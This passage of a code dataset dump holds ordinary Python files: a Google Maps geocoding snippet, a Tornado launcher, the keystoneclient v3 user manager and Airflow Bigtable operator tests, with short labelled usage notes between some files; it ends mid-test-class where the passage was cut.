code | repo_name | path | language | license | size
---|---|---|---|---|---
stringlengths 2–1.05M | stringlengths 5–104 | stringlengths 4–251 | stringclasses 1 value | stringclasses 15 values | int32 2–1.05M
# [START maps_http_geocode_place_id]
import requests
url = "https://maps.googleapis.com/maps/api/geocode/json?place_id=ChIJd8BlQ2BZwokRAFUEcm_qrcA&key=YOUR_API_KEY"
payload={}
headers = {}
response = requests.request("GET", url, headers=headers, data=payload)
print(response.text)
# [END maps_http_geocode_place_id] | googlemaps/openapi-specification | dist/snippets/maps_http_geocode_place_id/maps_http_geocode_place_id.py | Python | apache-2.0 | 320 |
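The snippet above only prints the raw response body. As a small follow-up sketch (not part of the original sample; it reuses the same place ID and the `YOUR_API_KEY` placeholder), the JSON payload can be checked and the first formatted address extracted, since the Geocoding API signals problems through its `status` field rather than HTTP status codes:

import requests

url = "https://maps.googleapis.com/maps/api/geocode/json"
params = {"place_id": "ChIJd8BlQ2BZwokRAFUEcm_qrcA", "key": "YOUR_API_KEY"}
response = requests.get(url, params=params, timeout=10)
data = response.json()
# The API reports problems (e.g. INVALID_REQUEST, REQUEST_DENIED) in "status".
if data.get("status") == "OK" and data.get("results"):
    print(data["results"][0]["formatted_address"])
else:
    print("Geocoding failed:", data.get("status"))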
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from game import app
http_server = HTTPServer(WSGIContainer(app))
http_server.listen(5000)
IOLoop.instance().start() | Drvanon/Game | run.py | Python | apache-2.0 | 232 |
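run.py imports `app` from a `game` module that is not included in this dump; any WSGI application would work there. A hypothetical minimal stand-in (assuming the project uses Flask, which is a guess, not something the file states) could be:

# game.py -- hypothetical stand-in matching `from game import app`; not the real module.
from flask import Flask

app = Flask(__name__)


@app.route('/')
def index():
    # Placeholder endpoint so the Tornado-wrapped server has something to serve.
    return 'game server is running'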
# Copyright 2011 OpenStack Foundation
# Copyright 2011 Nebula, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from keystoneclient import base
from keystoneclient import exceptions
from keystoneclient.i18n import _, _LW
from keystoneclient import utils
LOG = logging.getLogger(__name__)
class User(base.Resource):
"""Represents an Identity user.
Attributes:
* id: a uuid that identifies the user
"""
pass
class UserManager(base.CrudManager):
"""Manager class for manipulating Identity users."""
resource_class = User
collection_key = 'users'
key = 'user'
def _require_user_and_group(self, user, group):
if not (user and group):
msg = _('Specify both a user and a group')
raise exceptions.ValidationError(msg)
@utils.positional(1, enforcement=utils.positional.WARN)
def create(self, name, domain=None, project=None, password=None,
email=None, description=None, enabled=True,
default_project=None, **kwargs):
"""Create a user.
.. warning::
The project argument is deprecated, use default_project instead.
        If both default_project and project are provided, the default_project
will be used.
"""
if project:
LOG.warning(_LW("The project argument is deprecated, "
"use default_project instead."))
default_project_id = base.getid(default_project) or base.getid(project)
user_data = base.filter_none(name=name,
domain_id=base.getid(domain),
default_project_id=default_project_id,
password=password,
email=email,
description=description,
enabled=enabled,
**kwargs)
return self._create('/users', {'user': user_data}, 'user',
log=not bool(password))
@utils.positional(enforcement=utils.positional.WARN)
def list(self, project=None, domain=None, group=None, default_project=None,
**kwargs):
"""List users.
If project, domain or group are provided, then filter
users with those attributes.
If ``**kwargs`` are provided, then filter users with
attributes matching ``**kwargs``.
.. warning::
The project argument is deprecated, use default_project instead.
        If both default_project and project are provided, the default_project
will be used.
"""
if project:
LOG.warning(_LW("The project argument is deprecated, "
"use default_project instead."))
default_project_id = base.getid(default_project) or base.getid(project)
if group:
base_url = '/groups/%s' % base.getid(group)
else:
base_url = None
return super(UserManager, self).list(
base_url=base_url,
domain_id=base.getid(domain),
default_project_id=default_project_id,
**kwargs)
def get(self, user):
return super(UserManager, self).get(
user_id=base.getid(user))
@utils.positional(enforcement=utils.positional.WARN)
def update(self, user, name=None, domain=None, project=None, password=None,
email=None, description=None, enabled=None,
default_project=None, **kwargs):
"""Update a user.
.. warning::
The project argument is deprecated, use default_project instead.
        If both default_project and project are provided, the default_project
will be used.
"""
if project:
LOG.warning(_LW("The project argument is deprecated, "
"use default_project instead."))
default_project_id = base.getid(default_project) or base.getid(project)
user_data = base.filter_none(name=name,
domain_id=base.getid(domain),
default_project_id=default_project_id,
password=password,
email=email,
description=description,
enabled=enabled,
**kwargs)
return self._update('/users/%s' % base.getid(user),
{'user': user_data},
'user',
method='PATCH',
log=False)
def update_password(self, old_password, new_password):
"""Update the password for the user the token belongs to."""
if not (old_password and new_password):
msg = _('Specify both the current password and a new password')
raise exceptions.ValidationError(msg)
if old_password == new_password:
msg = _('Old password and new password must be different.')
raise exceptions.ValidationError(msg)
params = {'user': {'password': new_password,
'original_password': old_password}}
base_url = '/users/%s/password' % self.api.user_id
return self._update(base_url, params, method='POST', log=False,
endpoint_filter={'interface': 'public'})
def add_to_group(self, user, group):
self._require_user_and_group(user, group)
base_url = '/groups/%s' % base.getid(group)
return super(UserManager, self).put(
base_url=base_url,
user_id=base.getid(user))
def check_in_group(self, user, group):
self._require_user_and_group(user, group)
base_url = '/groups/%s' % base.getid(group)
return super(UserManager, self).head(
base_url=base_url,
user_id=base.getid(user))
def remove_from_group(self, user, group):
self._require_user_and_group(user, group)
base_url = '/groups/%s' % base.getid(group)
return super(UserManager, self).delete(
base_url=base_url,
user_id=base.getid(user))
def delete(self, user):
return super(UserManager, self).delete(
user_id=base.getid(user))
| ging/python-keystoneclient | keystoneclient/v3/users.py | Python | apache-2.0 | 6,977 |
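As context for the manager above: `project` is deprecated in favour of `default_project`, `create()` drops `None` fields via `base.filter_none`, and `update()` issues a PATCH with request-body logging disabled. A hedged usage sketch follows; the endpoint, credentials and names are placeholders, and the keystoneauth1 session shown is the usual construction pattern, assumed rather than taken from this file:

from keystoneauth1 import session
from keystoneauth1.identity import v3
from keystoneclient.v3 import client

# Placeholder credentials; any authenticated v3 client exposes `users` as a UserManager.
auth = v3.Password(auth_url='http://keystone:5000/v3',
                   username='admin', password='secret', project_name='admin',
                   user_domain_id='default', project_domain_id='default')
keystone = client.Client(session=session.Session(auth=auth))

# Prefer default_project over the deprecated project argument.
user = keystone.users.create(name='alice', password='s3cret',
                             email='alice@example.com', default_project='demo')

# update() sends only the supplied fields as a PATCH and suppresses body logging.
keystone.users.update(user, enabled=False, description='disabled account')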
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .client import SearchServiceClient
from .async_client import SearchServiceAsyncClient
__all__ = (
"SearchServiceClient",
"SearchServiceAsyncClient",
)
| googleapis/python-retail | google/cloud/retail_v2/services/search_service/__init__.py | Python | apache-2.0 | 765 |
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from typing import List, Dict
import google.api_core.exceptions
from google.cloud.bigtable.column_family import MaxVersionsGCRule
from google.cloud.bigtable.instance import Instance
from google.cloud.bigtable.table import ClusterState
from parameterized import parameterized
from airflow import AirflowException
from airflow.contrib.operators.gcp_bigtable_operator import \
BigtableInstanceDeleteOperator, \
BigtableTableDeleteOperator, \
BigtableTableCreateOperator, \
BigtableTableWaitForReplicationSensor, \
BigtableClusterUpdateOperator, \
BigtableInstanceCreateOperator
from tests.compat import mock
PROJECT_ID = 'test_project_id'
INSTANCE_ID = 'test-instance-id'
CLUSTER_ID = 'test-cluster-id'
CLUSTER_ZONE = 'us-central1-f'
GCP_CONN_ID = 'test-gcp-conn-id'
NODES = 5
TABLE_ID = 'test-table-id'
INITIAL_SPLIT_KEYS = [] # type: List
EMPTY_COLUMN_FAMILIES = {} # type: Dict
class BigtableInstanceCreateTest(unittest.TestCase):
@parameterized.expand([
('instance_id', PROJECT_ID, '', CLUSTER_ID, CLUSTER_ZONE),
('main_cluster_id', PROJECT_ID, INSTANCE_ID, '', CLUSTER_ZONE),
('main_cluster_zone', PROJECT_ID, INSTANCE_ID, CLUSTER_ID, ''),
], testcase_func_name=lambda f, n, p: 'test_empty_attribute.empty_' + p.args[0])
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_empty_attribute(self, missing_attribute, project_id, instance_id,
main_cluster_id,
main_cluster_zone, mock_hook):
with self.assertRaises(AirflowException) as e:
BigtableInstanceCreateOperator(
project_id=project_id,
instance_id=instance_id,
main_cluster_id=main_cluster_id,
main_cluster_zone=main_cluster_zone,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
err = e.exception
self.assertEqual(str(err), 'Empty parameter: {}'.format(missing_attribute))
mock_hook.assert_not_called()
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_create_instance_that_exists(self, mock_hook):
mock_hook.return_value.get_instance.return_value = mock.Mock(Instance)
op = BigtableInstanceCreateOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
main_cluster_id=CLUSTER_ID,
main_cluster_zone=CLUSTER_ZONE,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.create_instance.assert_not_called()
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_create_instance_that_exists_empty_project_id(self, mock_hook):
mock_hook.return_value.get_instance.return_value = mock.Mock(Instance)
op = BigtableInstanceCreateOperator(
instance_id=INSTANCE_ID,
main_cluster_id=CLUSTER_ID,
main_cluster_zone=CLUSTER_ZONE,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.create_instance.assert_not_called()
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_different_error_reraised(self, mock_hook):
mock_hook.return_value.get_instance.return_value = None
op = BigtableInstanceCreateOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
main_cluster_id=CLUSTER_ID,
main_cluster_zone=CLUSTER_ZONE,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.create_instance.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.GoogleAPICallError('error'))
with self.assertRaises(google.api_core.exceptions.GoogleAPICallError):
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.create_instance.assert_called_once_with(
cluster_nodes=None,
cluster_storage_type=None,
instance_display_name=None,
instance_id=INSTANCE_ID,
instance_labels=None,
instance_type=None,
main_cluster_id=CLUSTER_ID,
main_cluster_zone=CLUSTER_ZONE,
project_id=PROJECT_ID,
replica_cluster_id=None,
replica_cluster_zone=None,
timeout=None
)
class BigtableClusterUpdateTest(unittest.TestCase):
@parameterized.expand([
('instance_id', PROJECT_ID, '', CLUSTER_ID, NODES),
('cluster_id', PROJECT_ID, INSTANCE_ID, '', NODES),
('nodes', PROJECT_ID, INSTANCE_ID, CLUSTER_ID, ''),
], testcase_func_name=lambda f, n, p: 'test_empty_attribute.empty_' + p.args[0])
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_empty_attribute(self, missing_attribute, project_id, instance_id,
cluster_id, nodes, mock_hook):
with self.assertRaises(AirflowException) as e:
BigtableClusterUpdateOperator(
project_id=project_id,
instance_id=instance_id,
cluster_id=cluster_id,
nodes=nodes,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
err = e.exception
self.assertEqual(str(err), 'Empty parameter: {}'.format(missing_attribute))
mock_hook.assert_not_called()
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_updating_cluster_but_instance_does_not_exists(self, mock_hook):
mock_hook.return_value.get_instance.return_value = None
with self.assertRaises(AirflowException) as e:
op = BigtableClusterUpdateOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
cluster_id=CLUSTER_ID,
nodes=NODES,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
op.execute(None)
err = e.exception
self.assertEqual(str(err), "Dependency: instance '{}' does not exist.".format(
INSTANCE_ID))
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.update_cluster.assert_not_called()
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_updating_cluster_but_instance_does_not_exists_empty_project_id(self,
mock_hook):
mock_hook.return_value.get_instance.return_value = None
with self.assertRaises(AirflowException) as e:
op = BigtableClusterUpdateOperator(
instance_id=INSTANCE_ID,
cluster_id=CLUSTER_ID,
nodes=NODES,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
op.execute(None)
err = e.exception
self.assertEqual(str(err), "Dependency: instance '{}' does not exist.".format(
INSTANCE_ID))
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.update_cluster.assert_not_called()
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_updating_cluster_that_does_not_exists(self, mock_hook):
instance = mock_hook.return_value.get_instance.return_value = mock.Mock(Instance)
mock_hook.return_value.update_cluster.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.NotFound("Cluster not found."))
with self.assertRaises(AirflowException) as e:
op = BigtableClusterUpdateOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
cluster_id=CLUSTER_ID,
nodes=NODES,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
op.execute(None)
err = e.exception
self.assertEqual(
str(err),
"Dependency: cluster '{}' does not exist for instance '{}'.".format(
CLUSTER_ID, INSTANCE_ID)
)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.update_cluster.assert_called_once_with(
instance=instance, cluster_id=CLUSTER_ID, nodes=NODES)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_updating_cluster_that_does_not_exists_empty_project_id(self, mock_hook):
instance = mock_hook.return_value.get_instance.return_value = mock.Mock(Instance)
mock_hook.return_value.update_cluster.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.NotFound("Cluster not found."))
with self.assertRaises(AirflowException) as e:
op = BigtableClusterUpdateOperator(
instance_id=INSTANCE_ID,
cluster_id=CLUSTER_ID,
nodes=NODES,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
op.execute(None)
err = e.exception
self.assertEqual(
str(err),
"Dependency: cluster '{}' does not exist for instance '{}'.".format(
CLUSTER_ID, INSTANCE_ID)
)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.update_cluster.assert_called_once_with(
instance=instance, cluster_id=CLUSTER_ID, nodes=NODES)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_different_error_reraised(self, mock_hook):
op = BigtableClusterUpdateOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
cluster_id=CLUSTER_ID,
nodes=NODES,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
instance = mock_hook.return_value.get_instance.return_value = mock.Mock(Instance)
mock_hook.return_value.update_cluster.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.GoogleAPICallError('error'))
with self.assertRaises(google.api_core.exceptions.GoogleAPICallError):
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.update_cluster.assert_called_once_with(
instance=instance, cluster_id=CLUSTER_ID, nodes=NODES)
class BigtableInstanceDeleteTest(unittest.TestCase):
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_delete_execute(self, mock_hook):
op = BigtableInstanceDeleteOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.delete_instance.assert_called_once_with(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_delete_execute_empty_project_id(self, mock_hook):
op = BigtableInstanceDeleteOperator(
instance_id=INSTANCE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.delete_instance.assert_called_once_with(
project_id=None,
instance_id=INSTANCE_ID)
@parameterized.expand([
('instance_id', PROJECT_ID, ''),
], testcase_func_name=lambda f, n, p: 'test_empty_attribute.empty_' + p.args[0])
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_empty_attribute(self, missing_attribute, project_id, instance_id, mock_hook):
with self.assertRaises(AirflowException) as e:
BigtableInstanceDeleteOperator(
project_id=project_id,
instance_id=instance_id,
task_id="id"
)
err = e.exception
self.assertEqual(str(err), 'Empty parameter: {}'.format(missing_attribute))
mock_hook.assert_not_called()
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_deleting_instance_that_doesnt_exists(self, mock_hook):
op = BigtableInstanceDeleteOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.delete_instance.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.NotFound("Instance not found."))
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.delete_instance.assert_called_once_with(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_deleting_instance_that_doesnt_exists_empty_project_id(self, mock_hook):
op = BigtableInstanceDeleteOperator(
instance_id=INSTANCE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.delete_instance.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.NotFound("Instance not found."))
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.delete_instance.assert_called_once_with(
project_id=None,
instance_id=INSTANCE_ID)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_different_error_reraised(self, mock_hook):
op = BigtableInstanceDeleteOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.delete_instance.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.GoogleAPICallError('error'))
with self.assertRaises(google.api_core.exceptions.GoogleAPICallError):
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.delete_instance.assert_called_once_with(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID)
class BigtableTableDeleteTest(unittest.TestCase):
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_delete_execute(self, mock_hook):
op = BigtableTableDeleteOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.delete_table.assert_called_once_with(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID)
@parameterized.expand([
('instance_id', PROJECT_ID, '', TABLE_ID),
('table_id', PROJECT_ID, INSTANCE_ID, ''),
], testcase_func_name=lambda f, n, p: 'test_empty_attribute.empty_' + p.args[0])
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_empty_attribute(self, missing_attribute, project_id, instance_id, table_id,
mock_hook):
with self.assertRaises(AirflowException) as e:
BigtableTableDeleteOperator(
project_id=project_id,
instance_id=instance_id,
table_id=table_id,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
err = e.exception
self.assertEqual(str(err), 'Empty parameter: {}'.format(missing_attribute))
mock_hook.assert_not_called()
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_deleting_table_that_doesnt_exists(self, mock_hook):
op = BigtableTableDeleteOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.delete_table.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.NotFound("Table not found."))
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.delete_table.assert_called_once_with(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_deleting_table_that_doesnt_exists_empty_project_id(self, mock_hook):
op = BigtableTableDeleteOperator(
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.delete_table.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.NotFound("Table not found."))
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.delete_table.assert_called_once_with(
project_id=None,
instance_id=INSTANCE_ID,
table_id=TABLE_ID)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_deleting_table_when_instance_doesnt_exists(self, mock_hook):
op = BigtableTableDeleteOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.get_instance.return_value = None
with self.assertRaises(AirflowException) as e:
op.execute(None)
err = e.exception
self.assertEqual(str(err), "Dependency: instance '{}' does not exist.".format(
INSTANCE_ID))
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.delete_table.assert_not_called()
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_different_error_reraised(self, mock_hook):
op = BigtableTableDeleteOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.delete_table.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.GoogleAPICallError('error'))
with self.assertRaises(google.api_core.exceptions.GoogleAPICallError):
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.delete_table.assert_called_once_with(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID)
class BigtableTableCreateTest(unittest.TestCase):
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_create_execute(self, mock_hook):
op = BigtableTableCreateOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
initial_split_keys=INITIAL_SPLIT_KEYS,
column_families=EMPTY_COLUMN_FAMILIES,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
instance = mock_hook.return_value.get_instance.return_value = mock.Mock(Instance)
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.create_table.assert_called_once_with(
instance=instance,
table_id=TABLE_ID,
initial_split_keys=INITIAL_SPLIT_KEYS,
column_families=EMPTY_COLUMN_FAMILIES)
@parameterized.expand([
('instance_id', PROJECT_ID, '', TABLE_ID),
('table_id', PROJECT_ID, INSTANCE_ID, ''),
], testcase_func_name=lambda f, n, p: 'test_empty_attribute.empty_' + p.args[0])
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_empty_attribute(self, missing_attribute, project_id, instance_id, table_id,
mock_hook):
with self.assertRaises(AirflowException) as e:
BigtableTableCreateOperator(
project_id=project_id,
instance_id=instance_id,
table_id=table_id,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
err = e.exception
self.assertEqual(str(err), 'Empty parameter: {}'.format(missing_attribute))
mock_hook.assert_not_called()
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_instance_not_exists(self, mock_hook):
op = BigtableTableCreateOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
initial_split_keys=INITIAL_SPLIT_KEYS,
column_families=EMPTY_COLUMN_FAMILIES,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.get_instance.return_value = None
with self.assertRaises(AirflowException) as e:
op.execute(None)
err = e.exception
self.assertEqual(
str(err),
"Dependency: instance '{}' does not exist in project '{}'.".format(
INSTANCE_ID, PROJECT_ID)
)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_creating_table_that_exists(self, mock_hook):
op = BigtableTableCreateOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
initial_split_keys=INITIAL_SPLIT_KEYS,
column_families=EMPTY_COLUMN_FAMILIES,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.get_column_families_for_table.return_value = \
EMPTY_COLUMN_FAMILIES
instance = mock_hook.return_value.get_instance.return_value = mock.Mock(Instance)
mock_hook.return_value.create_table.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.AlreadyExists("Table already exists."))
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.create_table.assert_called_once_with(
instance=instance,
table_id=TABLE_ID,
initial_split_keys=INITIAL_SPLIT_KEYS,
column_families=EMPTY_COLUMN_FAMILIES)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_creating_table_that_exists_empty_project_id(self, mock_hook):
op = BigtableTableCreateOperator(
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
initial_split_keys=INITIAL_SPLIT_KEYS,
column_families=EMPTY_COLUMN_FAMILIES,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.get_column_families_for_table.return_value = \
EMPTY_COLUMN_FAMILIES
instance = mock_hook.return_value.get_instance.return_value = mock.Mock(Instance)
mock_hook.return_value.create_table.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.AlreadyExists("Table already exists."))
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.create_table.assert_called_once_with(
instance=instance,
table_id=TABLE_ID,
initial_split_keys=INITIAL_SPLIT_KEYS,
column_families=EMPTY_COLUMN_FAMILIES)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_creating_table_that_exists_with_different_column_families_ids_in_the_table(
self, mock_hook):
op = BigtableTableCreateOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
initial_split_keys=INITIAL_SPLIT_KEYS,
column_families=EMPTY_COLUMN_FAMILIES,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.get_column_families_for_table.return_value = {
"existing_family": None}
mock_hook.return_value.create_table.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.AlreadyExists("Table already exists."))
with self.assertRaises(AirflowException) as e:
op.execute(None)
err = e.exception
self.assertEqual(
str(err),
"Table '{}' already exists with different Column Families.".format(TABLE_ID)
)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_creating_table_that_exists_with_different_column_families_gc_rule_in__table(
self, mock_hook):
op = BigtableTableCreateOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
initial_split_keys=INITIAL_SPLIT_KEYS,
column_families={"cf-id": MaxVersionsGCRule(1)},
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
cf_mock = mock.Mock()
cf_mock.gc_rule = mock.Mock(return_value=MaxVersionsGCRule(2))
mock_hook.return_value.get_column_families_for_table.return_value = {
"cf-id": cf_mock
}
mock_hook.return_value.create_table.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.AlreadyExists("Table already exists."))
with self.assertRaises(AirflowException) as e:
op.execute(None)
err = e.exception
self.assertEqual(
str(err),
"Table '{}' already exists with different Column Families.".format(TABLE_ID)
)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
class BigtableWaitForTableReplicationTest(unittest.TestCase):
@parameterized.expand([
('instance_id', PROJECT_ID, '', TABLE_ID),
('table_id', PROJECT_ID, INSTANCE_ID, ''),
], testcase_func_name=lambda f, n, p: 'test_empty_attribute.empty_' + p.args[0])
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
